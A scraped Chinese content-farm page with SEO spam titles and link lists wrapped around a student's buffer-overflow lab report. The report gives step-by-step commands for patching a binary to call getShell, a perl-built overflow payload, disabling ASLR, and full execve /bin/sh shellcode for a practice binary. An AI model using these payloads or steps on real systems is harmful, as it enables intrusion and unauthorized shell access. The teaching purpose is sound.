当前位置: 首页 > news >正文

怎么做才能使网站ip增多免费创建个人商城网站

怎么做才能使网站ip增多,免费创建个人商城网站,怎么将网站做成小程序,企业名录app20232801 2023-2024-2 《网络攻防实践》实践九报告 1.实践内容 #xff08;1#xff09;手工修改可执行文件#xff0c;改变程序执行流程#xff0c;直接跳转到getShell函数。 #xff08;2#xff09;利用foo函数的Bof漏洞#xff0c;构造一个攻击输入字符串#xf…20232801 2023-2024-2 《网络攻防实践》实践九报告 1.实践内容 1手工修改可执行文件改变程序执行流程直接跳转到getShell函数。 2利用foo函数的Bof漏洞构造一个攻击输入字符串覆盖返回地址触发getShell函数。 3注入一个自己制作的shellcode并运行这段shellcode 2.实践过程 打开kali虚拟机将用户名改为ly。将学习通中下载的pwn1工具放入到kali中通过 mv pwn1 pwn20232801修改pwn1的学号信息。 1. 修改程序机器指令改变程序执行流程 使用命令objdump -d pwn20232801 | more 反编译这个文件。使用enter键可以继续向下查看找到main函数foo函数并且能够发现在main函数中调用了foo函数。 call 8048491:这条指令将调用位于地址8048491处的foo函数,其对应的机器指令为 e8d7ffffff。 main函数调用foo对应机器指令为“ e8 d7ffffff” 我们想要让它调用getShell只要修改“d7ffffff”为getShell-80484ba对应的补码就行47d-4ba 得到补码为c3ffffff 2. 修改可执行文件 为了防止意外可以回溯源工具在这里对pwn20232801 进行了一个复制,pwn20232801-2 cp pwn20232801 pwn20232801-2打开pwn20232801-2 vi pwn20232801-2打开以后发现全是乱码 输入:%!xxd将显示转化为16进制 通过/e8d7找到需要修改的内容 修改d7 为c3注意在退出保存前需要将16进制转化为原格式。:%!xxd -r 我们再次反汇编一下查看是否正确调用getshell:objdump -d pwn2 | more ,修改成功。 运行./pwn20232801 3. 改变程序执行流造成BOF攻击 使用objdump -d pwn20232801 | more观察foo函数发现其在栈顶中预留了0x1c大小也就是28个字节的缓冲区域。 当我们输入的字符串长度超出了它预留空间的话则会出现缓冲区溢出。 那我们只需要需构造一个字符串使其溢出溢出部分覆盖原始的返回地址变成getshell函数的起始地址即可。 另外可以用一个语句perl -e ‘print “11111111222222223333333344444444\x7d\x84\x04\x08\x0a”’ 20232801input 使用 命令查看是否修改成功。 xxd 20232801input 输入(cat 20222801input;cat) | ./pwn20222801-2 攻击成功 注入shellcode代码 首先安装execstack下载链接http://ftp.de.debian.org/debian/pool/main/p/prelink/execstack_0.0.20131005-1b10_amd64.deb 下载后使用命令dpkg -i execstack_0.0.20131005-1b10_amd64.deb完成安装 在此实验由于不小心将复制前的原工具删掉了重新下载了一个pwn1 修改设置 execstack -s pwn1 //设置堆栈可执行 execstack -q pwn1 //查询文件的堆栈是否可执行echo 0 /proc/sys/kernel/randomize_va_space //关闭地址随机化more /proc/sys/kernel/randomize_va_space //查询在这里我们需要分析如何让他溢出覆盖perl -e print A x 32;print \x1\x2\x3\x4\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x00 input_shellcode 即前面的x1\x2\x3\x4需要填写什么。 在一个终端1中输入(cat input_shellcode;cat) | ./pwn1 在打开另外一个终端2输入ps -ef | grep pwn20232906 可以pwn1的进程号这里我的是27964。 gdb调试该进程 attach 27964 disassemble foo //通过设置断点来查看注入buf的内存地址 break *0x080484ae c 在终端1中按下回车键 注意是先C 再回车info r esp //找到esp寄存器的值获得我们注入的字符串的地址x/16x 0xffffd52c从0xffffd52c开始观察可以发现数据采用小端字节序并且将返回地址改为ff ff d5 30就可以让程序执行Shellcode所以\x1\x2\x3\x4修改为\x30\x50\xff\xff 计算方法为0xffffd52c4ffffd530 于是我们便重新利用perl语言将返回地址修改正确并在最后加上回车0x0a然后重新运行程序。 perl -e print A x 32;print \x30\x50\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x00\x0a input_shellcode (cat input_shellcode;cat) | ./pwn1发现我们成功的获得了shell 3.学习中遇到的问题及解决 问题1 在kali 中使用 apt-get Execstack 无法下载execstack工具问题1解决方案找到下载网址在浏览器中下载后再解压。问题2在注入shellcode代码是使用前面修改过的pwn20232801-2始终找不到正确的地址问题2解决方案重新下载了一个pwn1工具。 4.实践总结 学习了什么是缓冲区溢出指在程序执行过程中向程序的缓冲区写入了超过其长度的内容导致数据溢出到被分配空间之外的内存空间进而覆盖其他内存空间的数据。 以及堆栈的在数据结构和操作系统中的不同。 参考资料 execstack下载 实践指导书
http://www.hkea.cn/news/14477816/

相关文章:

  • 网站上的弹框如何做网页网站开发的费用
  • cms 企业网站贵阳公司网站
  • asp网站源码说明郑州外贸网站推广
  • html5个人网站源码贵阳景观设计公司
  • 网络推广网站的方法想做农村电商怎么入手
  • 网站挂直播连接怎么做郑州百度关键词seo
  • jsp网站开发模式常州网站制作方案
  • 网站开发培训中心中小型网站设计哪家好
  • 贵阳北京小学网站建设广州冼村和猎德村哪个最有钱
  • 网站改版新闻2017网站建设方案
  • 网站建设 服务质量保证好的网站特点
  • 价格对比网站开发北京网络营销策划公司
  • 嘉兴网站设计999 999商城网站的开发怎么做的
  • 网站开发项目付款方式暖色网站
  • 网站推广免费 优帮云translate wordpress
  • wordpress 网站加载过慢6做网站上传服务器吗
  • 常德网站制作建设惠州房地产网站开发
  • 站长联盟凡科网页版
  • 网站广告设计怎么做长春网站优化实战
  • 景点网站怎么做做推广的技巧
  • 网站设计属于什么分类号房屋在线设计工具
  • 网站上的验证码怎么做的网站标签图片修改
  • 专业做酒类营销的网站网站在开发过程中如何做SEO
  • 大型网站开发模型seo系统优化
  • 抚顺网站建设公司网站建设框架注意事项
  • 电商网站的支付接入该怎么做呢dw可以做视频网站么
  • 宋庄网站建设腾和企业网站管理系统
  • 网站开发工作wordpress每篇文章加水印
  • 庄河网站建设公司外包服务网站排名
  • 苏州建设培训中心网站计算机网站开发与技术专业介绍